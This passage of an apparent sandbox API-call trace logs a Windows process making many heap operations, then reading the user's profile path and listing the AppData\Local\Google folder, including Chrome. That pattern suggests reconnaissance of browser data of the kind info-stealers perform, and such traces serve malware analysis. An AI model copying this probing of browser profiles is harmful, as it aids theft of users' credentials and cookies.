wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0209.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0209.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0209.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0209.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0209.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.826] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0209.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0209.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0209.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0209.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0209.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0209.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0209.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0209.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0209.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0209.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0209.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0209.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0209.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa418 [0209.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0209.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0209.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.827] CloseHandle (hObject=0x2c4) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0209.828] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0209.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0209.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0209.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0209.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0209.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0209.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0209.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0209.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0209.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0209.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0209.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0209.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0209.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0209.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0209.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0209.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0209.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0209.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0209.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0209.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0209.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0209.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0209.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0209.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0209.833] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0209.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0209.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0209.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0209.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0209.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0209.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0209.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0209.834] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0209.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0209.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0209.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0209.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0209.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0209.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0209.834] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0209.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0209.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0209.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0209.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0209.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0209.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0209.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0209.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0209.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0209.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0209.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0209.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0209.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0209.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0209.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0209.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0209.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0209.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0209.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0209.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0209.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0209.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x66) returned 0x2417000 [0209.836] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Google", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google", lpFilePart=0x8bedfc*="Google") returned 0x32 [0209.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2417000 | out: hHeap=0x25c0000) returned 1 [0209.836] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google")) returned 0x2010 [0209.836] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1068, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa58e0 [0209.837] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1068, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0209.837] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1068, dwReserved1=0x4, cFileName="Chrome", cAlternateFileName="")) returned 1 [0209.837] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b0b7d20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6b0b7d20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1068, dwReserved1=0x4, cFileName="CrashReports", cAlternateFileName="CRASHR~1")) returned 1 [0209.837] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b0b7d20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, 